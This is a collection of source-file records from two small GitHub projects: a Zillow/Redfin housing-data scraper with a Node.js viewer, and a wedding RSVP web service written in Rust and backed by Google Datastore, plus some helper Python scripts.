"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2122, "license_type": "permissive", "max_line_length": 105, "num_lines": 72, "path": "/data_scrapping/zillow_mine/spiders/bs4_json.py", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "from bs4 import BeautifulSoup\nfrom datetime import date, timedelta\nfrom zillow_mine.spiders.to_db import db_parse\n\n\nclass bsj:\n\n\n def __init__(self, page_source = []):\n self.page_source = page_source\n self.dic = []\n self.data = []\n\n\n def stripz(self, inn):\n return inn.strip('$').replace(',','')\n\n\n def num_test(self, numb):\n numbz = numb.replace('.','').strip('$')\n if numbz.isnumeric():\n return numb\n else:\n return None\n\n\n def extract(self):\n\n self.dic = []\n 
soup = BeautifulSoup(self.page_source, 'html.parser')\n divs = soup.find_all(\"tr\", {\"class\":\"tableRow\"})\n\n for sub in divs:\n \n try:\n address = sub.find('a', {'class':'address'}).get_text()\n location = sub.find('div', {'class':'location'}).get_text()\n price = self.stripz(sub.find('td', {'class':'column column_3 col_price'}).get_text())\n price = self.num_test(price)\n beds = sub.find('td', {'class':'column column_4 col_beds'}).get_text()\n beds = self.num_test(beds)\n baths = sub.find('td', {'class':'column column_5 col_baths'}).get_text()\n baths = self.num_test(baths)\n sqft = self.stripz(sub.find('td', {'class':'column column_6 col_sqft'}).get_text())\n sqft = self.num_test(sqft)\n per_sqft = self.stripz(sub.find('td', {'class':'column column_7 col_ppsqft'}).get_text())\n per_sqft = self.num_test(per_sqft)\n\n if (address is None) | (price is None):\n pass\n else:\n self.dic = [str(date.today()), address, location, price, beds, baths, sqft, per_sqft]\n self.data.append(self.dic)\n \n except:\n pass\n\n\n def parse_db(self):\n inser = db_parse(data = self.data)\n inser.initiate()\n\n\n def initate(self):\n self.extract()\n self.parse_db()\n\n\nif __name__ == '__main__':\n x = bsj()\n x.extract()\n x.parse_db()\n" }, { "alpha_fraction": 0.6857143044471741, "alphanum_fraction": 0.6857143044471741, "avg_line_length": 18.22222137451172, "blob_id": "90fd17362655959f5d65a6b1fbc606e833fef8a1", "content_id": "ee49d49b82f5e4018f714cdfedf88a41fb361260", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 175, "license_type": "permissive", "max_line_length": 44, "num_lines": 9, "path": "/node_server/routes/front.js", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "\nconst express = require('express');\n\nconst front = require('../controller/front')\n\nconst router = express.Router();\n\nrouter.get('/', front.front);\n\nmodule.exports = router;\n\n" }, { "alpha_fraction": 0.6348039507865906, "alphanum_fraction": 0.6470588445663452, "avg_line_length": 20.799999237060547, "blob_id": "b619ddf56c3ea43fef3bf8cc5a7999e5a151167d", "content_id": "91bbca15e85c16d2d8fe50f3ec87d51f080b7210", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 408, "license_type": "permissive", "max_line_length": 70, "num_lines": 19, "path": "/setup.py", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "\nfrom setuptools import setup, find_packages\n\n\nwith open('README.md') as f:\n readme = f.read()\n\nwith open('LICENSE') as f:\n license = f.read()\n\nsetup(\n name='zill',\n version='0.1.0',\n description='Deployment of scraping Redfin and Node.js webserver',\n long_description=readme,\n author='Alan Tam',\n author_email='[email protected]',\n url='https://github.com/AlanK27/zill',\n license=license\n)" }, { "alpha_fraction": 0.7906976938247681, "alphanum_fraction": 0.7906976938247681, "avg_line_length": 27.33333396911621, "blob_id": "7704f89c2e12206b3ebebad672d6fad182551f1c", "content_id": "6ed2a476907bf4e9c0f6ca9709929c5ab6b80c2e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 86, "license_type": "permissive", "max_line_length": 42, "num_lines": 3, "path": "/data_scrapping/zillow_mine/spiders/sql_queries/operation.sql", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "\ndelete from yesterday;\nINSERT INTO yesterday SELECT * FROM today;\ndelete from today;\n" }, { "alpha_fraction":
0.7983706593513489, "alphanum_fraction": 0.7983706593513489, "avg_line_length": 43.54545593261719, "blob_id": "ba0fb94c44edc3a75b00bf698d26a615da8d80c3", "content_id": "4db3187aaa86a866685611f137bba8eb16f7c458", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 491, "license_type": "permissive", "max_line_length": 90, "num_lines": 11, "path": "/README.md", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "\n# Vegas Housing Data\n\nThis project data-mines housing information on Zillow in the surrounding Las Vegas market.\nDue to certain restrictions on Zillow's own website, the selenium library is used in addition\nto scrapy to pull the data.\n\nMined data is stored in a MySQL database and viewed on a webserver. The server handles the\ndata and updates the price changes on a weekly and monthly basis.\n\n### *Note*\nMake sure chromedriver is the correct version and located in the directory mine/driver/.\n" } ]
20
sillyproject/codingchallengenov
https://github.com/sillyproject/codingchallengenov
5b006b4f33d62a044929caa154af46624afe584c
fe39cdf347ce4a66ca76f555b3c7fed257daca63
b55828c13921c3cd6ee6b81d089c06a41c68d698
refs/heads/master
2018-01-11T03:21:03.745229
2015-11-06T22:46:58
2015-11-06T22:46:58
45,664,919
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7050740122795105, "alphanum_fraction": 0.7230443954467773, "avg_line_length": 48.68421173095703, "blob_id": "20e2ad0ba6d521f5c85e7d30181fb325ab0b116e", "content_id": "0c5a613655eec75f24a769c763bdcda46acedff8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 946, "license_type": "no_license", "max_line_length": 149, "num_lines": 19, "path": "/README.md", "repo_name": "sillyproject/codingchallengenov", "src_encoding": "UTF-8", "text": "Insight Data Engineering - Coding Challenge\n===========================================================\nDate: Nov 5, 2015\n\nProgram used in this Coding Challenge: Python 2.7.10, MacOS Lion 10.7.5\nExternal Library: Networkx (https://networkx.github.io/documentation/latest/install.html)\n\n\n\n## Challenge Summary\n\nThis challenge is to implement two features:\n\n1. Clean and extract the text from the raw JSON tweets that come from the Twitter Streaming API, and track the number of tweets that contain unicode.\n2. Calculate the average degree of a vertex in a Twitter hashtag graph for the last 60 seconds, and update this each time a new tweet appears.\n\nHere, we have to define a few concepts:\n- A tweet's text is considered \"clean\" once all of the escape characters (e.g. \\n, \\\", \\/ ) are replaced and unicode have been removed.\n- A Twitter hashtag graph is a graph connecting all the hashtags that have been mentioned together in a single tweet.\n\n\n" }, { "alpha_fraction": 0.6367131471633911, "alphanum_fraction": 0.652570903301239, "avg_line_length": 30.530303955078125, "blob_id": "225fbe3a103608204e3597b2f97c16280d91d5ef", "content_id": "944df9e493e1e01d11d724bb79e407b700c1f29b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2081, "license_type": "no_license", "max_line_length": 137, "num_lines": 66, "path": "/src/average_degree.py", "repo_name": "sillyproject/codingchallengenov", "src_encoding": "UTF-8", "text": "# example of program that calculates the average degree of hashtags\n\nimport os.path\nimport time\nimport networkx as nx\nimport datetime\nfrom datetime import datetime\nfrom datetime import timedelta\nimport re\n\n\nstart_time = time.time()\n\ndef extract_hashtags(s):\n t = s.lower\n return set(part for part in t.split() if part.startswith('#'))\n\ndef extract_timestamp(s):\n match = re.search(r'\\d{2}:\\d{2}:\\d{2}', s)\n return match.group() \n\n# assume using output from tweets_cleaned to make process faster\ndata = open(\"/Users/sibog/Desktop/codingchallengenov/tweet_input/tweetsclean.txt\")\ntweets = data.readlines()\nnum_lines = sum(1 for line in tweets)\n\nft2 = os.path.join(\"/Users/sibog/Desktop/codingchallengenov/tweet_output/ft2.txt\")\nfile2 = open(ft2, 'w')\n\n# check which tweets were in last 60 seconds (from the bottom of the list to top)\ncount=0\ntdelta=timedelta(0,0)\nwhile tdelta < timedelta(seconds=60):\n t0 = datetime.strptime(extract_timestamp(tweets[num_lines-2-count]),'%H:%M:%S')\n t1 = datetime.strptime(extract_timestamp(tweets[num_lines-1]), '%H:%M:%S')\n tdelta = t1-t0\n count += 1\ncorrected_num_lines = num_lines-count\n\nn = corrected_num_lines\ng = nx.Graph()\nfor n in range(n, num_lines):\n \n hashtags = set(i for i in tweets[n].lower().split() if i.startswith('#')) #make hashtags all lowercase to count for any duplicates \n hashtags = list(hashtags)\n\n num_hashtags = sum(1 for line in hashtags)\n\n #connect all hashtags within one tweets\n if num_hashtags > 1:\n i 
= 0\n for i in range (i, num_hashtags):\n if i == 0:\n g.add_edge(hashtags[0], hashtags[num_hashtags-1])\n elif 0 < i < num_hashtags:\n g.add_edge(hashtags[i], hashtags[i-1])\n\n\nsequence = g.degree().values()\navg_degree = sum(sequence)/float(len(sequence))\n\nprint >>file2, round(avg_degree,2) #rounded to the nearest hundredths place\n\nfile2.close()\n\n#print(\"--- %s seconds ---\" % (time.time() - start_time)) #time used to run this program\n" }, { "alpha_fraction": 0.6147540807723999, "alphanum_fraction": 0.631147563457489, "avg_line_length": 32.272727966308594, "blob_id": "17940a7f2ac1d0469afbd07c40b314d9e4a35014", "content_id": "0a222b9f39b96cbe2c62b255a5648754230c734d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1098, "license_type": "no_license", "max_line_length": 106, "num_lines": 33, "path": "/src/tweets_cleaned.py", "repo_name": "sillyproject/codingchallengenov", "src_encoding": "UTF-8", "text": "# example of program that calculates the number of tweets cleaned\n# Author: Sibo Gao\n# Date: Nov 5, 2015\n\nimport os.path\nimport time\nstart_time = time.time()\n\n#configure the input files assuming in the following directory:\ndata = open(\"/Users/sibog/Desktop/codingchallengenov/tweet_input/tweets.txt\")\ntweets = data.readlines()\nnum_lines = sum(1 for line in tweets)\nfile1 = open(\"/Users/sibog/Desktop/codingchallengenov/tweet_output/ft1.txt\", 'w')\n\nn = 0\ncount = 0\nfor n in range(n, num_lines):\n \n textraw = tweets[n].split(',\"text\":\"')[1].split('\",\"source\"')[0] \n timestamp = tweets[n].split('\"created_at\":\"')[1].split('\",\"id\"')[0]\n text = textraw.decode('unicode_escape').encode('ascii','ignore')\n if text != textraw:\n count = count + 1\n else:\n count = count\n print >>file1, text + \" (timestamp: \" + timestamp + \")\"\n\n\nprint >>file1, \"\\n\" + \"{} {}\".format(count, \"tweets contained unicode.\") #concatenate integer and string \n\nfile1.close()\n\n#print(\"--- %s seconds ---\" % (time.time() - start_time)) #time used to run this program\n" } ]
3
jvandew/wwww
https://github.com/jvandew/wwww
dd8e5a41e65c462a0f97d0059d291bb5d8a728b5
ac04e780541be960e2e5011969a922d0a22afd51
8f8e2da05878feb1de9f0fc7e3e65b258088caa3
refs/heads/master
2021-06-23T16:00:35.796716
2019-04-25T04:03:09
2019-04-25T04:03:09
115,649,184
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6182648539543152, "alphanum_fraction": 0.6219177842140198, "avg_line_length": 26.375, "blob_id": "6726b181aabab66cf20d9a2eabe497a8f7c21ba4", "content_id": "7d7ace9d9d9d7d0bd2bfd2c7f2045a39171ae4da", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1095, "license_type": "no_license", "max_line_length": 75, "num_lines": 40, "path": "/scripts/create_rsvp.py", "repo_name": "jvandew/wwww", "src_encoding": "UTF-8", "text": "from google.cloud import datastore\n\n\ndef main():\n datastore_client = datastore.Client()\n partial_key = datastore_client.key('rsvp')\n\n saved_count = 0\n print('enter rsvp data, \\'done\\' to quit on invited count or first name')\n\n invited_count_input = input('invited count: ').lower()\n while invited_count_input != 'done':\n invited_count = int(invited_count_input)\n invited = []\n\n first_name = input('first name: ').lower()\n while first_name != 'done':\n last_name = input('last name: ').lower()\n invited.append({\n 'first_name': first_name,\n 'last_name': last_name,\n })\n first_name = input('first name: ').lower()\n\n key = datastore_client.allocate_ids(partial_key, 1)[0]\n rsvp = datastore.Entity(\n key=key,\n exclude_from_indexes=['invited_count'],\n )\n rsvp['invited'] = invited\n rsvp['invited_count'] = invited_count\n datastore_client.put(rsvp)\n saved_count += 1\n\n invited_count_input = input('invited_count: ').lower()\n\n print('created {} rsvp entries'.format(saved_count))\n\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.6672991514205933, "alphanum_fraction": 0.6723592877388, "avg_line_length": 30.6200008392334, "blob_id": "20c40287586324d2537722a569fd7c45017d7866", "content_id": "64fffa337995e231db84c81c98b6b69f8dc24995", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 3162, "license_type": "no_license", "max_line_length": 95, "num_lines": 100, "path": "/src/main.rs", "repo_name": "jvandew/wwww", "src_encoding": "UTF-8", "text": "extern crate bytes;\nextern crate futures;\nextern crate hyper;\nextern crate hyper_tls;\nextern crate itertools;\nextern crate jsonwebtoken;\nextern crate regex;\nextern crate tokio_core;\nextern crate url;\n\n#[macro_use]\nextern crate serde_derive;\n\n#[macro_use]\nextern crate serde_json;\n\nuse futures::Future;\nuse futures::future;\nuse futures::stream::Stream;\nuse hyper::Client;\nuse hyper::server::Http;\nuse hyper_tls::HttpsConnector;\nuse std::fs::{self, File};\nuse std::net::{IpAddr, Ipv4Addr, SocketAddr};\nuse std::str;\nuse tokio_core::reactor::Core;\n\nmod datastore;\nmod model;\nmod service;\n\nuse service::RsvpService;\n\n#[derive(Clone, Deserialize, Serialize)]\nstruct AccountDetails {\n project_id: String,\n private_key_id: String,\n client_email: String,\n}\n\n#[derive(Clone)]\npub struct AccountData {\n details: AccountDetails,\n private_key: Vec<u8>,\n public_key: Vec<u8>,\n}\n\n#[derive(Clone, Deserialize, Serialize)]\npub struct RsvpCredentials {\n admin: String,\n user: String,\n}\n\nfn main() {\n let account_file = File::open(\"keys/application-datastore-user.json\")\n .expect(\"failed to open account details file\");\n let account_details = serde_json::from_reader(account_file)\n .expect(\"failed to parse account details\");\n let account_private_key = fs::read(\"keys/private_rsa_key.der\")\n .expect(\"Failed to read account private key\");\n let account_public_key = fs::read(\"keys/public_rsa_key.der\")\n .expect(\"Failed to read account public 
key\");\n let account_data = AccountData {\n details: account_details,\n private_key: account_private_key,\n public_key: account_public_key,\n };\n\n let rsvp_credentials_file = File::open(\"keys/rsvp_credentials.json\")\n .expect(\"failed to open rsvp credentials file\");\n let rsvp_credentials: RsvpCredentials = serde_json::from_reader(rsvp_credentials_file)\n .expect(\"failed to parse rsvp credentials\");\n\n let mut event_loop = Core::new().expect(\"unable to create event loop\");\n let event_loop_handle = event_loop.handle();\n let https = HttpsConnector::new(2, &event_loop_handle).expect(\"TLS initialization failed\");\n let client = Client::configure().connector(https).build(&event_loop_handle);\n\n let socket_addr = SocketAddr::new(\n IpAddr::V4(Ipv4Addr::new(127, 0, 0, 1)),\n 8080,\n );\n\n let service = RsvpService::new(client, account_data, rsvp_credentials);\n let server = Http::new()\n .serve_addr_handle(&socket_addr, &event_loop_handle, move || Ok(service.clone()))\n .expect(\"unable to bind http server\");\n let inner_event_loop_handle = event_loop_handle.clone();\n\n println!(\"running...\");\n let connection_handle_future = server.for_each(move |connection| {\n let connection_future = connection\n .map(|_| ())\n .map_err(|error| eprintln!(\"server error: {}\", error));\n inner_event_loop_handle.spawn(connection_future);\n Ok(())\n }).map_err(|error| eprintln!(\"server spawn error: {}\", error));\n event_loop_handle.spawn(connection_handle_future);\n event_loop.run(future::empty::<(),()>()).expect(\"failed to start event loop\");\n}\n" }, { "alpha_fraction": 0.4416983127593994, "alphanum_fraction": 0.4440501630306244, "avg_line_length": 39.324459075927734, "blob_id": "dea8fd82cd51af73b4c694afcda2844484ec114f", "content_id": "18329f7d0aabf67c032e32fcc98f5a4d2e6625a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Rust", "length_bytes": 24236, "license_type": "no_license", "max_line_length": 104, "num_lines": 601, "path": "/src/service/mod.rs", "repo_name": "jvandew/wwww", "src_encoding": "UTF-8", "text": "use bytes::Bytes;\nuse futures::Future;\nuse futures::future;\nuse futures::stream::Stream;\nuse hyper::{Body, Client, Method, StatusCode, Uri};\nuse hyper::{Error as HyperError};\nuse hyper::client::{self, HttpConnector};\nuse hyper::header::{self, Accept, Authorization, Bearer, ContentType};\nuse hyper::mime::APPLICATION_JSON;\nuse hyper::server::{self, Service};\nuse hyper_tls::HttpsConnector;\nuse itertools;\nuse jsonwebtoken::{self, Algorithm, Header};\nuse serde_json::{self, Value};\nuse std::collections::HashMap;\nuse std::io::Read;\nuse std::iter::FromIterator;\nuse std::fs::File;\nuse std::io::BufReader;\nuse std::str;\nuse std::time::{SystemTime, UNIX_EPOCH};\nuse url::form_urlencoded;\n\npub mod form;\n\nuse {AccountData, RsvpCredentials};\nuse datastore::client::{CommitResult, RsvpQueryResult};\nuse model::Rsvp;\n\nstatic DATASTORE_API: &'static str = \"google.datastore.v1.Datastore\";\nstatic DATASTORE_HOST: &'static str = \"https://datastore.googleapis.com\";\n\ntype ResponseFuture = Box<Future<Item = server::Response<Body>, Error = HyperError>>;\n\n// TODO(jacob): convert all Strings to &str\n#[derive(Deserialize, Serialize)]\nstruct Claims {\n iss: String,\n sub: String,\n aud: String,\n iat: u64,\n exp: u64,\n}\n\n#[derive(Debug)]\nstruct LoginData {\n first_name: String,\n last_name: String,\n password: String,\n}\n\nimpl LoginData {\n fn from_form_data(form_data: &[u8]) -> Option<LoginData> {\n let params = 
form_urlencoded::parse(form_data).collect::<HashMap<_, _>>();\n let first_name = params.get(\"first_name\")?;\n let last_name = params.get(\"last_name\")?;\n let password = params.get(\"password\")?;\n\n let login_data = LoginData {\n first_name: first_name.to_string(),\n last_name: last_name.to_string(),\n password: password.to_string(),\n };\n Some(login_data)\n }\n}\n\n#[derive(Clone)]\npub struct RsvpService {\n datastore_client: Client<HttpsConnector<HttpConnector>, Body>,\n account_data: AccountData,\n rsvp_credentials: RsvpCredentials,\n}\n\nimpl RsvpService {\n pub fn new(\n datastore_client: Client<HttpsConnector<HttpConnector>, Body>,\n account_data: AccountData,\n rsvp_credentials: RsvpCredentials,\n ) -> RsvpService {\n RsvpService {\n datastore_client: datastore_client,\n account_data: account_data,\n rsvp_credentials: rsvp_credentials,\n }\n }\n\n fn get_datastore_token(account_data: &AccountData) -> String {\n let time = SystemTime::now()\n .duration_since(UNIX_EPOCH)\n .expect(\"Error getting unix timestamp\")\n .as_secs();\n\n let mut jwt_header = Header::default();\n jwt_header.alg = Algorithm::RS256;\n jwt_header.kid = Some(account_data.details.private_key_id.clone());\n jwt_header.typ = Some(\"JWT\".to_string());\n\n let claims = Claims {\n iss: account_data.details.client_email.clone(),\n sub: account_data.details.client_email.clone(),\n aud: format!(\"{}/{}\", DATASTORE_HOST, DATASTORE_API),\n iat: time,\n exp: time + 3600,\n };\n\n jsonwebtoken::encode(&jwt_header, &claims, &account_data.private_key)\n .expect(\"Error encoding json web token\")\n }\n\n fn build_datastore_request(\n account_data: &AccountData,\n endpoint: &str,\n request_json: String,\n ) -> client::Request<Body> {\n let uri = format!(\n \"{}/v1/projects/{}:{}\",\n DATASTORE_HOST,\n account_data.details.project_id,\n endpoint,\n ).parse().expect(\"Unable to parse query uri\");\n\n let token = RsvpService::get_datastore_token(account_data);\n\n let mut request = client::Request::new(Method::Post, uri);\n request.headers_mut().set(Accept(vec![header::qitem(APPLICATION_JSON)]));\n request.headers_mut().set(Authorization(Bearer { token: token }));\n request.headers_mut().set(ContentType(APPLICATION_JSON));\n request.set_body(Body::from(request_json));\n request\n }\n\n fn build_commit_request(\n account_data: &AccountData,\n transaction_id: &str,\n rsvp: Rsvp,\n ) -> client::Request<Body> {\n let commit_request = json!({\n \"mode\": \"TRANSACTIONAL\",\n \"mutations\": [\n {\n \"update\": rsvp.to_json(),\n },\n ],\n \"transaction\": transaction_id,\n }).to_string();\n RsvpService::build_datastore_request(\n account_data,\n \"commit\",\n commit_request,\n )\n }\n\n fn build_query_request(\n account_data: &AccountData,\n first_name: &str,\n last_name: &str,\n ) -> client::Request<Body> {\n let query_request = json!({\n \"query\": {\n \"filter\": {\n \"compositeFilter\": {\n \"op\": \"AND\",\n \"filters\": [\n {\n \"propertyFilter\": {\n \"property\": {\n \"name\": \"invited.first_name\",\n },\n \"op\": \"EQUAL\",\n \"value\": {\n \"stringValue\": first_name.to_lowercase(),\n },\n },\n },\n {\n \"propertyFilter\": {\n \"property\": {\n \"name\": \"invited.last_name\",\n },\n \"op\": \"EQUAL\",\n \"value\": {\n \"stringValue\": last_name.to_lowercase(),\n },\n },\n },\n ],\n },\n },\n \"kind\": [\n {\n \"name\": \"rsvp\",\n },\n ],\n },\n }).to_string();\n RsvpService::build_datastore_request(account_data, \"runQuery\", query_request)\n }\n\n fn build_transaction_request(account_data: &AccountData) -> 
client::Request<Body> {\n let transaction_request = json!({\n \"transactionOptions\": {\n \"readWrite\": {\n }\n }\n }).to_string();\n RsvpService::build_datastore_request(\n account_data,\n \"beginTransaction\",\n transaction_request,\n )\n }\n\n fn failed_login(status_code: StatusCode, reason: String) -> ResponseFuture {\n let file = File::open(format!(\"www/rsvp.html\"))\n .expect(\"failed to open login form file\");\n let mut buf_reader = BufReader::new(file);\n let mut template = String::new();\n buf_reader.read_to_string(&mut template)\n .expect(\"failed to read login form file\");\n let rendered = template.replace(\"<!--$login_error-->\", &reason);\n let response = server::Response::new()\n .with_status(status_code)\n .with_body(Body::from(rendered));\n Box::new(future::ok(response))\n }\n\n // TODO(jacob): This should be a method on self.\n fn handle_login(\n account_data: AccountData,\n datastore_client: Client<HttpsConnector<HttpConnector>, Body>,\n rsvp_credentials: RsvpCredentials,\n data: &[u8],\n ) -> Option<ResponseFuture> {\n let login_data = LoginData::from_form_data(data)?;\n println!(\"login attempt: {:?}\", login_data);\n\n if login_data.password != rsvp_credentials.user {\n let response_future = RsvpService::failed_login(\n StatusCode::Unauthorized,\n \"Invalid login, please try again.\".to_string(),\n );\n Some(response_future)\n\n } else {\n let request = RsvpService::build_query_request(\n &account_data,\n &login_data.first_name,\n &login_data.last_name,\n );\n\n let response_future = datastore_client.request(request).and_then(move |response| {\n response.body().concat2().and_then(move |raw_query_result| {\n let query_result_string = str::from_utf8(&raw_query_result)\n .expect(\"unable to parse database rsvp entry\");\n let query_result_json = serde_json::from_str(query_result_string)\n .expect(\"unable to parse database rsvp json\");\n\n match RsvpQueryResult::from_json(&query_result_json) {\n RsvpQueryResult::NotFound => RsvpService::failed_login(\n StatusCode::NotFound,\n \"Guest not found, please try again.\".to_string(),\n ),\n\n RsvpQueryResult::Multiple(rsvps) => {\n println!(\n \"multiple rsvp entries found for {}, {}: {:?}\",\n login_data.last_name,\n login_data.first_name,\n rsvps,\n );\n RsvpService::failed_login(\n StatusCode::InternalServerError,\n \"Multiple guest entries found, please contact Jacob.\".to_string(),\n )\n },\n\n RsvpQueryResult::Single(rsvp) => RsvpService::render_form(\n &account_data,\n rsvp,\n None,\n StatusCode::Ok,\n ),\n }\n })\n });\n Some(Box::new(response_future))\n }\n }\n\n fn handle_static(uri: Uri) -> ResponseFuture {\n let path = {\n if uri.path().ends_with(\"/\") {\n format!(\"{}index.html\", uri.path())\n } else {\n uri.path().to_string()\n }\n };\n let response = File::open(format!(\"www{}\", path)).ok().map_or_else(\n || server::Response::new()\n .with_status(StatusCode::NotFound)\n .with_body(\"Not Found\"),\n |file| {\n let bytes = Bytes::from_iter(itertools::flatten(file.bytes()));\n server::Response::new()\n .with_body(Body::from(bytes))\n },\n );\n Box::new(future::ok(response))\n }\n\n // TODO(jacob): This should be a method on self.\n fn handle_submission<'a>(\n account_data: AccountData,\n datastore_client: Client<HttpsConnector<HttpConnector>, Body>,\n data: &[u8],\n ) -> Option<ResponseFuture> {\n // TODO(jacob): There are a bunch of clones in this function. 
They would seem to\n // be removable by just having the closures borrow their values instead of\n // taking ownership, but that may not be possible due to the static lifetime\n // of the futures these closures are operating over. If it isn't possible,\n // we should just have Rsvp implement Copy so this happens automatically.\n let account_data1 = account_data.clone();\n let account_data2 = account_data.clone();\n let account_data3 = account_data.clone();\n let rsvp1 = Rsvp::from_form_data(&account_data, data)?;\n let rsvp2 = rsvp1.clone();\n let rsvp3 = rsvp1.clone();\n let rsvp4 = rsvp1.clone();\n let transaction_request = RsvpService::build_transaction_request(&account_data);\n\n let response_future = datastore_client.request(transaction_request)\n .and_then(move |transaction_response| {\n transaction_response.body().concat2().and_then(move |raw_result| {\n let transaction_string = str::from_utf8(&raw_result)\n .expect(\"unable to parse transaction response\");\n let transaction_json = serde_json::from_str::<Value>(transaction_string)\n .expect(\"unable to parse transaction json\");\n\n transaction_json[\"transaction\"].as_str().map_or_else(\n || {\n let message = RsvpService::render_message(\n \"Error saving rsvp, please try again later and contact \\\n Jacob if this error persists.\",\n true,\n );\n RsvpService::render_form(\n &account_data,\n rsvp1,\n Some(&message),\n StatusCode::InternalServerError,\n )\n },\n\n |transaction_id| {\n let commit_request = RsvpService::build_commit_request(\n &account_data1,\n transaction_id,\n rsvp2,\n );\n let response_future = datastore_client.request(commit_request)\n .and_then(move |commit_response| {\n commit_response.body().concat2().and_then(move |raw_commit_result| {\n let commit_string = str::from_utf8(&raw_commit_result)\n .expect(\"unable to parse commit response\");\n let commit_json = serde_json::from_str::<Value>(commit_string)\n .expect(\"unable to parse commit json\");\n\n CommitResult::from_json(&commit_json).map_or_else(\n || {\n let message = RsvpService::render_message(\n \"Error saving rsvp, please try again later \\\n and contact Jacob if this error persists.\",\n true,\n );\n RsvpService::render_form(\n &account_data2,\n rsvp3,\n Some(&message),\n StatusCode::InternalServerError,\n )\n },\n\n |commit_result| {\n println!(\n \"successfully saved rsvp with result: {:?}\",\n commit_result,\n );\n let message = RsvpService::render_message(\n \"Rsvp saved successfully!\",\n false,\n );\n RsvpService::render_form(\n &account_data3,\n rsvp4,\n Some(&message),\n StatusCode::Ok,\n )\n },\n )\n })\n });\n Box::new(response_future)\n },\n )\n })\n });\n Some(Box::new(response_future))\n }\n\n fn get_auth_token(\n account_data: &AccountData,\n rsvp: &Rsvp,\n ) -> String {\n let empty_rsvp_json = match rsvp {\n empty @ Rsvp::Empty { .. 
} => empty.to_json(),\n Rsvp::Full {\n key,\n attending: _,\n email: _,\n going: _,\n invited,\n other_notes: _,\n invited_count,\n } => {\n let empty = Rsvp::Empty {\n key: key.clone(),\n invited: invited.to_vec(),\n invited_count: *invited_count,\n };\n empty.to_json()\n }\n };\n\n let mut header = Header::default();\n header.alg = Algorithm::RS256;\n jsonwebtoken::encode(&header, &empty_rsvp_json, &account_data.private_key)\n .expect(\"Error encoding auth token\")\n }\n\n fn render_message(message: &str, error: bool) -> String {\n let div = if error { \"<div style=\\\"color: red\\\">\" } else { \"<div>\" };\n format!(\"{}{}</div><a href=\\\"/\\\">Return home</a>\", div, message)\n }\n\n fn render_form(\n account_data: &AccountData,\n rsvp: Rsvp,\n message_opt: Option<&str>,\n status_code: StatusCode,\n ) -> ResponseFuture {\n let form_file = File::open(\"www/rsvp2.html\").expect(\"failed to open rsvp form template\");\n let mut form_reader = BufReader::new(form_file);\n let mut form_template = String::new();\n form_reader.read_to_string(&mut form_template).expect(\"failed to read form template\");\n\n let guest_file = File::open(\"templates/guest.html\").expect(\"failed to open guest template\");\n let mut guest_reader = BufReader::new(guest_file);\n let mut guest_template = String::new();\n guest_reader.read_to_string(&mut guest_template).expect(\"failed to read guest template\");\n\n let token = RsvpService::get_auth_token(account_data, &rsvp);\n let message = message_opt.unwrap_or(\"\");\n let rendered = match rsvp {\n Rsvp::Empty {\n key: _,\n invited: _,\n invited_count,\n } => {\n let guests = (0..invited_count).fold(\n String::new(),\n |mut guests_builder, guest_num| {\n let rendered_guest = guest_template\n .replace(\"$num\", &(guest_num + 1).to_string())\n .replace(\"$index\", &guest_num.to_string())\n .replace(\"$first_name\", \"\")\n .replace(\"$last_name\", \"\")\n .replace(\"$dietary_notes\", \"\");\n guests_builder.push_str(&rendered_guest);\n guests_builder\n },\n );\n\n form_template\n .replace(\"$message\", message)\n .replace(\"$token\", &token)\n .replace(\"$checked\", \"checked\")\n .replace(\"$guests\", &guests)\n .replace(\"$email\", \"\")\n .replace(\"$other_notes\", \"\")\n },\n\n Rsvp::Full {\n key: _,\n attending,\n email,\n going,\n invited: _,\n other_notes,\n invited_count,\n } => {\n let checked = if going { \"checked\" } else { \"\" };\n let guests = (0..invited_count).fold(\n String::new(),\n |mut guests_builder, guest_num| {\n let attending_opt = attending.get(guest_num as usize);\n let first_name = attending_opt\n .map(|a| a.name.first_name.clone())\n .unwrap_or(\"\".to_string());\n let last_name = attending_opt\n .map(|a| a.name.last_name.clone())\n .unwrap_or(\"\".to_string());\n let dietary_notes = attending_opt\n .map(|a| a.dietary_notes.clone())\n .unwrap_or(\"\".to_string());\n let rendered_guest = guest_template\n .replace(\"$num\", &(guest_num + 1).to_string())\n .replace(\"$index\", &guest_num.to_string())\n .replace(\"$first_name\", &first_name)\n .replace(\"$last_name\", &last_name)\n .replace(\"$dietary_notes\", &dietary_notes);\n guests_builder.push_str(&rendered_guest);\n guests_builder\n },\n );\n\n form_template\n .replace(\"$message\", message)\n .replace(\"$token\", &token)\n .replace(\"$checked\", &checked)\n .replace(\"$guests\", &guests)\n .replace(\"$email\", &email)\n .replace(\"$other_notes\", &other_notes)\n },\n };\n\n let response = server::Response::new()\n .with_status(status_code)\n .with_body(Body::from(rendered));\n 
